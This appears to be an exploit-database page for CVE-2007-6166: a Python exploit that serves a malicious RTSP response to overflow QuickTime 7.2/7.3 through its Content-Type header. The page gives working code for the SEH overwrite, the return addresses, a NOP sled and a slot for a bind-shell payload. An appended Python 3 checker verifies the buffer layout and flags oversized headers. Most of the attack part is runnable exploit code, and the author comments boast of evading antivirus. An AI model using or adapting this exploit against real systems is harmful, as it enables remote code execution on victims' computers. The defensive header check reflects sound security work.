Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal

Related Vulnerabilities: CVE-2007-6166  
Publish Date: 26 Nov 2007
Author: muts
# Bug discovered by Krystian Kloskowski (h07) <>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# there IS NO SPOON!
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
# the attack appears to be prevented because standard buffer overflow  
# prevention processes act before any damage can be done, Florio wrote.  
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
# the exploit works against Firefox if QuickTime is the default multimedia player,  
# according to Florio."
# Calling QuickTime via URL kicks in an extra exception handler
# over which we have no control.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler and regain control over execution.
# This is indeed an evil exploit - muhaha.
# Python 2 (as originally published). Serves one malicious RTSP response to the
# first client that connects on 554/tcp: the overlong Content-Type value is the
# overflow; the SDP body is only there to look like a plausible stream description.
from socket import *

header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://\r\n'
'Content-Type: %s\r\n'   # <-- overflow
'Content-Length: %d\r\n'
'\r\n')                  # blank line terminates the RTSP header block

body = (
'o=- 16689332712 1 IN IP4\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
't=0 0\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4\r\n')

# ExitProcess shellcode will kill browser, but keep the shell open
# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2
# The 696-byte Alpha2-encoded payload is not reproduced on this page; paste it here.
shellcode = (
""
)

tmp = "A" * 987                  # padding up to the SEH record
tmp += "\xeb\x20\x90\x90"        # nSEH for 7.2: short jump (EB 20) forward into the NOP sled
tmp += "\xeb\x20\x9c\x66"        # 669c20eb | funky magic - pop pop ret (handler) for 7.2 / nSEH short jump for 7.3
tmp += "\x4e\x28\x86\x66"        # 6686284e | pop pop ret (handler) for 7.3
tmp += "\x90" * 92               # NOP sled that both short jumps land in
tmp += shellcode
tmp += "\x41" * int(30000 - len(shellcode))    # play with this buffer if you still get exceptions.

header %= (tmp, len(body))
evil = header + body

s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(("", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.send(evil)                     # one response is all it takes; the client never sends a request we care about
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
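Added example, not part of the original exploit or of h07/muts' code: a Python 3 layout checker for the SEH-overwrite buffer above, plus a header-length check on the finished RTSP response. The offsets (987 bytes of padding, three 4-byte slots, a 92-byte NOP sled, then shellcode) and the 7.2/7.3 assignment of the slots are read from the page's own buffer construction and comments; the 696-byte stand-in payload and the `build_rtsp_response`/`oversized_headers` helpers are constructed here for illustration. It verifies the "funky magic" claim mechanically: that 0x669c20eb, stored little-endian as EB 20 9C 66, is simultaneously a pop/pop/ret address on 7.2 and a short jump on 7.3, and that both short jumps land inside the sled.

```python
# Added example (not from the original exploit): layout checker for the
# SEH-overwrite buffer, plus a header-length check on the finished RTSP response.
# Offsets come straight from the page's buffer construction.
import struct

PAD = 987
NSEH_72 = PAD            # 987: next-SEH pointer as overwritten on QuickTime 7.2
SEH_72 = PAD + 4         # 991: handler pointer on 7.2 (pop/pop/ret 0x669c20eb)
NSEH_73 = SEH_72         # 991: the same 4 bytes act as the next-SEH slot on 7.3
SEH_73 = PAD + 8         # 995: handler pointer on 7.3 (pop/pop/ret 0x6686284e)
SLED_START = PAD + 12    # 999: first byte of the NOP sled
SLED_LEN = 92
SHELLCODE_START = SLED_START + SLED_LEN   # 1091


def build_overflow(shellcode, total=30000):
    """Rebuild the page's Content-Type value: padding, SEH slots, sled, payload, filler."""
    buf = b"A" * PAD
    buf += b"\xeb\x20\x90\x90"
    buf += b"\xeb\x20\x9c\x66"
    buf += b"\x4e\x28\x86\x66"
    buf += b"\x90" * SLED_LEN
    buf += shellcode
    buf += b"\x41" * (total - len(shellcode))
    return buf


def seh_record(buf, nseh_off):
    """Return (nSEH bytes, handler address) for the 8-byte SEH record at nseh_off."""
    nseh = buf[nseh_off:nseh_off + 4]
    handler = struct.unpack("<I", buf[nseh_off + 4:nseh_off + 8])[0]
    return nseh, handler


def short_jmp_target(buf, off):
    """Decode the 2-byte JMP rel8 (EB xx) at off; return the offset it jumps to."""
    if buf[off] != 0xEB:
        raise ValueError("no short jump at offset %d" % off)
    rel = struct.unpack("b", buf[off + 1:off + 2])[0]   # signed 8-bit displacement
    return off + 2 + rel                                 # relative to the next instruction


def lands_in_sled(buf, target):
    """True if target is inside the NOP sled, so execution slides into the shellcode."""
    return SLED_START <= target < SHELLCODE_START and buf[target] == 0x90


def build_rtsp_response(content_type, body):
    """RTSP/1.0 response carrying the overflow in Content-Type (constructed, like the page's)."""
    header = (b"RTSP/1.0 200 OK\r\n"
              b"CSeq: 1\r\n"
              b"Content-Base: rtsp://\r\n"
              b"Content-Type: " + content_type + b"\r\n"
              b"Content-Length: " + str(len(body)).encode() + b"\r\n"
              b"\r\n")
    return header + body


def header_value_lengths(response):
    """Map lower-cased header name -> value length for an RTSP/HTTP-style response."""
    head = response.split(b"\r\n\r\n", 1)[0]
    lengths = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        lengths[name.strip().lower()] = len(value.strip())
    return lengths


def oversized_headers(response, limit=1024):
    """Header names whose value exceeds limit: the sanity check an RTSP proxy could apply."""
    return sorted(n for n, l in header_value_lengths(response).items() if l > limit)


if __name__ == "__main__":
    payload = b"\xcc" * 696                  # constructed stand-in for the 696-byte bind shell
    buf = build_overflow(payload)
    for label, nseh in (("7.2", NSEH_72), ("7.3", NSEH_73)):
        jmp_bytes, handler = seh_record(buf, nseh)
        target = short_jmp_target(buf, nseh)
        print("%s: nSEH=%s handler=0x%08x jmp->%d in_sled=%s" % (
            label, jmp_bytes.hex(), handler, target, lands_in_sled(buf, target)))
    resp = build_rtsp_response(buf, b"m=audio 0 RTP/AVP 14\r\n")
    print("oversized headers:", oversized_headers(resp))
```

On 7.2 the record starts at offset 987: `EB 20` jumps to 1021, well inside the sled, and the handler slot holds 0x669c20eb. On 7.3 the record is shifted by four bytes, so the handler bytes from the 7.2 layout become the nSEH slot and are executed as `jmp $+0x22` (target 1025), while 0x6686284e takes over as the handler. The `oversized_headers` check is the defender's side of the same response: a Content-Type value of 31091 bytes is not something a legitimate RTSP server produces.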

# [2007-11-26]